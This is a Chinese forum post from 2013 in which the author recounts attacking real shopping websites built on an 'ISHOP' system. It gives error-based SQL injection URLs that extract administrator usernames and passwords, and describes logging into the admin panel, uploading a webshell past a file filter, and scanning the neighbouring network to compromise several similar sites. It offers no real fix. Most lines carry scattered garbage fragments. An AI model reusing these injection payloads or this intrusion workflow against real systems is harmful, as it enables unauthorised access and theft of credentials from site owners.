找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2226|回复: 0
打印 上一主题 下一主题

ISHOP商场建站系统注入漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2013-4-4 17:40:38 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
发现一个注入点2 u$ s$ J, s7 R! m; Z
http://www.xxx.com /Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389' a( y* \# p8 V3 F! W. S
2 J- h4 \5 T7 s" N% j- O
习惯性的加’having1=1--! |: P+ N5 i5 P! R8 C& a

) `! x8 j& ]* m* _# q1 \http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389’having 1=1—
2 Q+ |; V- B7 m; r# F% i, @" {, A' a7 H! A: A, g
0
3 X; V2 I. d8 i: t. m) }7 B; G0 J  K
爆出Diary_A.dl_Title(这时候很激动啊)0 A; J+ d) @  t1 j6 T

/ k' X$ f/ ?# H' A+ C4 Z$ j那么继续
/ @* B# A3 c) R# m0 z8 }9 Dhttp://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389’group by dl_Title having 1=1—; a8 `+ R& _& Q

9 c3 ^% r3 a+ P% {继续,一直爆下去
4 S- f5 g; g  Z& h( u& d8 A; ]% Q/ r  B1 U( H) v+ O1 K, ]  R: g
爆到几个字段和表段 但是没找到需要的管理用户的字段
$ d5 Q* \% I- z
; k$ R; f3 a( g' b蛋疼了 怎么办 然后去后台登陆页看源码6 U5 v0 ]9 [( M/ p
7 b, N# |  T6 ^7 g' B2 ?+ l1 G, I& b8 @
0. L9 g! k, T+ w; C, ~5 [

4 k9 M2 R) m9 X/ O6 [Input name= “ADUID”
0 O+ K8 k* C, y2 f- _Input name= “ADPWD”# T4 T% y7 H2 Y+ _9 r

( b( l/ E2 v3 ^1 g: d$ a5 A5 |7 T5 [很幸运 找到了字段那就继续
: L6 m8 }$ @7 M+ F找到之后开始爆用户
. E$ {& G7 G: G  }# H" Ahttp://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389'and(select top 1 MGR_UID from A_MGR)>0—+ I5 }  Q  A5 D4 L4 \
爆密码
$ L/ T, ^" o& H3 s; l* B# Zhttp://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389'and(select top 1 MGR_PWD from A_MGR)>0—7 @5 e( ~8 T& _. M# @5 d1 M
测试了下 这个注入点只能爆到文章哪里的表 & Y/ ~# v) y: A) d

$ z' p; g' i, z头疼 继续 既然只能报道文章哪里的表去后台爆 不过后台字符限制了
% P5 B0 |. w3 U- C) ^$ E
4 h+ U/ S# h2 f# R1 H; j! w又想到 用户登录哪里也可以的吧就去试试 果然 今天我很幸运吧 爆出来了
( @( r( O& U0 ?! o% C2 o1 R8 o& t' w: u7 [) B+ }! o
473( m* B) U( c1 {# C+ u

9 u5 {; J5 x6 J8 U: W7 Q8 \* b. y进后台# ?5 r+ U" S" T

& T/ f' X  U( ?% }0 B+ T  o) Z3 `
* B9 s* k; ]- h发现几个上传点 有的地方不能上传 而且防止恶意代码# W8 V  E7 _# c  X! r2 w0 {
. O- g! o# E& ^3 J3 N
没办法 各种百度各种找大牛 找到一只好像可以突破的马
& \% i2 P! F+ ?% y" Q6 p2 E0 _6 @) `* P  R$ Q9 y' s
2 l- _, @& }: O9 C  |
在系统管理那里直接上传 不过没有显示地址
, Z; m" `" \: F* \0 Y6 Z  p8 d
; I' I: |% R1 |5 B再上传一次 抓包 搞定OK
5 d3 w+ @7 m* E8 V$ {! Z$ ?( U1 x3 A# G

. N" u3 u- e4 Z  k1 r+ S
) Z4 ?' {+ I* ^1 T; k+ J$ m472
: x. r) v0 S% i' l( Z/ i
' K% E4 r% E! J晚上不行了 去睡觉。。。
* M5 \7 i$ R% V' H第二天刚起床 闲的没事做继续日站吧 5 X0 {7 a* }9 U" ~/ L

+ Y) w& n& b5 l) S找个站 就把这个站的旁c扫了下' ?& w/ d) G& h7 e2 K
, e" P7 ^( q7 }& _8 k# Q
发现c段也有一个购物站 ,然后还和这个站的模板差不多
% i& s" t0 r1 B- F8 h( q/ R- k  A- k1 Z3 S) f1 U+ b) o, O' U; g/ `
就找到会员登录口测试& x$ d2 o) F$ d/ L# c

9 }- u: J! X6 K; d( J! z% g5 ~'and (select top 1 MGR_UID from A_MGR)>0—
: c; Z- S4 Y! g+ X9 S- v果断爆到了 这时候我很激动 通杀
- k) m2 \: ^$ h' `
- r! ?4 o  o% U6 I( X) a5 ^再次翻c段
" q9 _3 e1 b0 x5 g0 {1 A0 R
/ m" S" d6 G) H& j5 E7 }翻出几个站 都成功拿下
& P/ n& |- \. }( \9 E9 X/ O1 J! O8 C

6 f2 c  z9 c; K7 i1 c
1 L3 Q% q2 p0 z% J修复方案:5 {& I  z; i( ?# Z% W
他们比我专业 3 |3 I, x1 D& d" Z

3 _2 F: i: l' T% |. {
$ F! R. P% s- M! ?4 `9 \
/ u9 k( ^7 {, m$ i6 e
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表